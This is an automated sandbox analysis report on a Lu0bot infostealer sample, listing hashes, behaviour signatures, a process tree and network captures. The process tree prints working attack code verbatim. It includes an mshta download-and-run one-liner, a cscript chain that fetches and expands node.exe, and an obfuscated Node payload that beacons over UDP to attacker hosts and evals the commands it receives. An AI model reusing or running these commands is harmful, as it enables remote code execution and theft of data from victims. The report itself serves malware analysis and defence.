Analysis

  • max time kernel
    149s
  • max time network
    181s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-07-2021 14:17

General

  • Target

    usfive_20210711-154344.exe

  • Size

    3KB

  • MD5

    15467567c301ef6ae8b98d4fafb6db67

  • SHA1

    9884574ad77b49580ab14047342b4580324cb6ee

  • SHA256

    9db5c02ac4e161369160fe13719a212e55377dd57ffc9f98b7141bce3b9df26c

  • SHA512

    5b3d68e59a908312a8e009d2b6ec4af06be67ee7a762d996ed914de9c00bf5edd57dd38f8eaac52bff5ff8a42e7760b7503b517c671bffc37bb55327b37382b1

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • NTFS ADS 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210711-154344.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();184;y=unescape('%325%31%7E%68t%74p%3A%2F%2Fl%751%2Ea%73i%61%2F%68r%69%2F%3F2%31a%36e%34b%7E3%34').split('~');29;try{x='WinHttp';55;x=new ActiveXObject(x+'.'+x+'Request.5.1');187;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);165;x.send();220;y='ipt.S';191;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);204;}catch(e){};30;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab & expand node.cab node.exe & del get1626014142501.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626014142501.txt & cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626014142501.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1500
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626014142501.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2fee0e72c%26b%3Dfa1d848c" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:1536
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:1468
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1626014142501.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:516
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27fee0e72c%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • NTFS ADS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:396
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c dir C:\
              6⤵
                PID:880
              • C:\Windows\SysWOW64\cacls.exe
                cacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F
                6⤵
                  PID:1592
                • C:\Windows\SysWOW64\icacls.exe
                  icacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)
                  6⤵
                  • Modifies file permissions
                  PID:924
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException
                  6⤵
                  • Views/modifies file attributes
                  PID:1916
                • C:\Windows\SysWOW64\attrib.exe
                  attrib.exe +H C:\ProgramData\DNTException\node.exe
                  6⤵
                  • Views/modifies file attributes
                  PID:1768
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /fo csv /nh
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:972
                • C:\Windows\SysWOW64\Wbem\wmic.exe
                  wmic process get processid,parentprocessid,name,executablepath /format:csv
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:864
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig.exe /all
                  6⤵
                  • Gathers network information
                  PID:564
                • C:\Windows\SysWOW64\route.exe
                  route.exe print
                  6⤵
                    PID:592
                  • C:\Windows\SysWOW64\netstat.exe
                    netstat.exe -ano
                    6⤵
                    • Gathers network information
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1028
                  • C:\Windows\SysWOW64\systeminfo.exe
                    systeminfo.exe /fo csv
                    6⤵
                    • Gathers system information
                    PID:1660

        Network

        • flag-unknown
          DNS
          lu1.asia
          mshta.exe
          Remote address:
          8.8.8.8:53
          Request
          lu1.asia
          IN A
          Response
          lu1.asia
          IN A
          5.188.206.211
        • flag-unknown
          GET
          http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29
          mshta.exe
          Remote address:
          5.188.206.211:80
          Request
          GET /hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: lu1.asia
          Response
          HTTP/1.1 200 OK
          Content-Type: text/plain;charset=UTF-8
          Server: Caddy
          X-Powered-By: PHP/7.3.25
          Date: Sun, 11 Jul 2021 14:35:42 GMT
          Transfer-Encoding: chunked
        • flag-unknown
          DNS
          asu02.shop
          cscript.exe
          Remote address:
          8.8.8.8:53
          Request
          asu02.shop
          IN A
          Response
          asu02.shop
          IN A
          5.188.206.211
        • flag-unknown
          GET
          http://asu02.shop/hri/?2fee0e72c&b=fa1d848c
          cscript.exe
          Remote address:
          5.188.206.211:80
          Request
          GET /hri/?2fee0e72c&b=fa1d848c HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: asu02.shop
          Response
          HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Server: Caddy
          X-Powered-By: PHP/7.3.25
          Date: Sun, 11 Jul 2021 14:35:43 GMT
          Transfer-Encoding: chunked
        • flag-unknown
          DNS
          asu00.xyz
          node.exe
          Remote address:
          8.8.8.8:53
          Request
          asu00.xyz
          IN A
          Response
          asu00.xyz
          IN A
          5.188.206.211
        • flag-unknown
          DNS
          lu0.viewdns.net
          node.exe
          Remote address:
          8.8.8.8:53
          Request
          lu0.viewdns.net
          IN A
          Response
        • 5.188.206.211:80
          http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29
          http
          mshta.exe
          655 B
          2.6kB
          5
          4

          HTTP Request

          GET http://lu1.asia/hri/?21a6e4b&a=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20WOW64%3B%20Trident/7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20InfoPath.3%29

          HTTP Response

          200
        • 5.188.206.211:80
          http://asu02.shop/hri/?2fee0e72c&b=fa1d848c
          http
          cscript.exe
          37.2kB
          2.3MB
          805
          1564

          HTTP Request

          GET http://asu02.shop/hri/?2fee0e72c&b=fa1d848c

          HTTP Response

          200
        • 8.8.8.8:53
          lu1.asia
          dns
          mshta.exe
          54 B
          70 B
          1
          1

          DNS Request

          lu1.asia

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          asu02.shop
          dns
          cscript.exe
          56 B
          72 B
          1
          1

          DNS Request

          asu02.shop

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          asu00.xyz
          dns
          node.exe
          55 B
          71 B
          1
          1

          DNS Request

          asu00.xyz

          DNS Response

          5.188.206.211

        • 8.8.8.8:53
          lu0.viewdns.net
          dns
          node.exe
          61 B
          121 B
          1
          1

          DNS Request

          lu0.viewdns.net

        • 5.188.206.211:19584
          asu00.xyz
          node.exe
          20.2kB
          33.2kB
          156
          145

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/396-74-0x0000000014100000-0x0000000014101000-memory.dmp

          Filesize

          4KB

        • memory/396-75-0x0000000034000000-0x0000000034001000-memory.dmp

          Filesize

          4KB

        • memory/396-76-0x0000000035C00000-0x0000000035C01000-memory.dmp

          Filesize

          4KB

        • memory/396-77-0x000000000E300000-0x000000000E301000-memory.dmp

          Filesize

          4KB

        • memory/396-78-0x000000001D000000-0x000000001D001000-memory.dmp

          Filesize

          4KB

        • memory/396-73-0x0000000024700000-0x0000000024701000-memory.dmp

          Filesize

          4KB

        • memory/1536-63-0x0000000075A31000-0x0000000075A33000-memory.dmp

          Filesize

          8KB

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.